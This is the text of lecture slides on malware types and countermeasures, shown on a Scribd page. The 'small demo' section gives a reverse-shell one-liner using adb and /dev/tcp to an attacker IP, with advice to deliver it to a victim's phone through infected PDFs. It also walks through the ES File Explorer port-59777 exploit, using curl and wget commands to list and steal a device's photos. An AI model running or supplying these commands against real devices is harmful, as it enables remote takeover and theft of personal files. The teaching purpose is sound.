Scribd Logo
Upload

Welcome to Scribd!

  • CH 3

    Uploaded by

    Ahmad Alaraby
    7 views26 pages

    Original Title

    ch3

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    7 views26 pages

    CH 3

    Uploaded by

    Ahmad Alaraby

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 26

    Chapter3: Malicious Software

    and Security Countermeasures


    Malicious Software
    • Malware is malicious software /executed using different approaches
    including injection
    • Has an effect that the user did not intend
    • This umbrella term covers a whole range of different types of
    software
    • Can be introduced onto a system in a number of different ways
    Malicious Software
    • Runs on a computer (or a mobile device!)
    • System or user may activate it
    • Reasons for malware include:
    • Access personal information
    • Obtain account information
    • Access/move/delete files
    • Fun
    • Use the victim computer to commit a crime
    Types of Malware
    • The generic term can be used to describe some of the following:
    • Viruses
    • Worms
    • Ransomware
    • Trojans
    • RATs
    • Rootkits
    • Backdoors
    • Logic Bombs
    Malicious Software
    It is all about code Injection (small demo)
    • How to hack into Android devices in easy steps using adb
    • Get the following 2-line as a script file into the victim phone either
    through SD card, your website or inject the following into Android
    devices using any top vulnerabilities such as Adobe PDF format file
    embedded in emails, documents.
    • adb connect {replace_with_victim_ip}:9966
    • adb shell sh -i >& /dev/tcp/{replace_with_your_ip}/6699 0>&1

    • See this video


    • https://www.youtube.com/watch?v=opk8lWuZm70
    This was a zero-day exploit when it was
    dropped on Twitter on Jan. 16, 2019:
    ES File Explorer is very popular, with over 100 million
    downloads. However, it exposes your phone to remote
    control over the network.
    Launching the App
    App Interface
    Connecting to your Android Device with ADB
    On Kali, in a Terminal, execute these commands, replacing
    the IP address with the IP address of Android device:

    • adb connect 172.16.123.154


    • adb devices -l

    https://www.youtube.com/watch?v=BCCiEZ9VJ2g
    Viewing the Listening Process

    • On Kali, in a Terminal, execute these commands:


    • adb shell netstat -pant | grep LISTEN
    • exit
    • You see a process named "com.estrongs.android.pop" listening on
    port 59777,
    • On Kali, in a Terminal, execute this command, replacing the IP address
    with the IP address of victim Android device:

    • curl --header "Content-Type: application/json" --request POST --data


    '{"command":"getDeviceInfo"}' http://172.16.123.154:59777
    Stealing a picture
    Stealing a photo
    • On Kali, in a Terminal, execute this command, replacing the IP address
    with the IP address of your Genymotion Android device:
    • curl --header "Content-Type: application/json" --request POST --
    data '{"command":"listPics"}' http://172.16.123.154:59777
    Stealing a picture
    On Kali, in a Terminal, execute this command, replacing the IP address and path to the correct values
    for your system:

    wget http://172.16.123.154:59777//storage/emulated/0/DCIM/Camera/IMG_20190116_141301.jpg

    The file downloads, as shown below.


    Stealing a picture
    On Kali, in a Terminal, execute this
    command to view the file, replacing
    the filename with the correct name
    on your system:

    xdg-open
    IMG_20190116_141301.jpg
    The file appears, as shown below.
    Viruses
    • Viruses “Everything is a virus”
    • This is an example of media not understanding the subject
    • Actually less common than other types of malware
    • Requires a host file to infect, just like a biological virus requires a cell
    This limits the ability of the virus to replicate on diverse systems
    • E.g. Excel macro viruses
    Worms
    • Worms Self replicating malware
    • Has a method of autonomous propagation
    • Typically used to create botnets by infecting a large number of hosts
    • Sasser worm exploited MS04-011
    • https://technet.microsoft.com/en-us/library/security/ms04-011.aspx
    • Conficker worm exploited MS08-067
    • https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
    Ransomware

    • Encrypts files and hard drives


    • Typically asks for payment in virtual currency
    • Deadline for payment or files will not be decrypted
    • No guarantee that files will be decrypted on payment
    Rootkits
    • Rootkits work by hijacking different levels of a
    computer system.
    • For example a rootkit existing on the kernel level will
    intercept a call to open() and execute its own code.
    • A virus scanner will make an operating system call to
    list the files in a particular directory whose actual
    contents include; Good.exe, Good.exe, Bad.exe, and
    Bad.exe, where the Bad.exe files are the rootkit
    executables.
    • The rootkit will intercept the system call and return
    only the Good.exe files, therefore the virus scanner
    will have no knowledge of the existence of the
    rootkits, as they were implemented in the operating
    system level.
    Logic Bombs and Backdoors
    • Logic Bombs execute malicious actions when a certain event is
    triggered or a period of time has gone by
    • Backdoors are code within an application, created intentionally or
    unintentionally, that enable unauthorised access to networks or
    systems
    Spyware
    • Will not cause any direct damage to the
    system
    • Can install other software (e.g. key-logger)
    • Does not self replicate, but it could be
    deployed by Worm or Trojan
    • Hidden and hard to detect
    • Collects information which is then sent to
    Third Parties without owner’s consent
    • Attach themselves to your operating system
    RATs Remote Administration
    • Tools Allows attacker to
    manipulate the victim
    computer
    • Often provides stealthy
    communication channel May
    allow for management of a
    large number of victims
    • Remote Access Tools (RATs)
    are very popular, because
    they can give remote access
    to a large number of devices
    concurrently.
    Adware
    • Will not cause any directly
    damage to the system
    • Displays Popup adverts for
    monetary gain
    Botnets
    • A Botnet is a large number of computers
    controlled by a bot master over the
    Internet
    • It could come as a shock to you to know
    that your computer at this very moment
    may be sending spam email, distributing
    child pornography or helping to crash
    Twitter’s servers in a bid to take them
    offline.
    • A bot is installed by a type of trojan, a
    form of malware hiding in your operating
    system waiting idly by for instructions
    from a command and control server that
    is controlled by a criminal, known as
    a botmaster or bot herder.
    Code Injection in Web Applications
    • SQL injection: Inserts
    malicious code into web
    page, which is later
    passed to a database
    server.
    • The SQL server then
    parses and executes this
    code
    Zero Day Exploits

    You might also like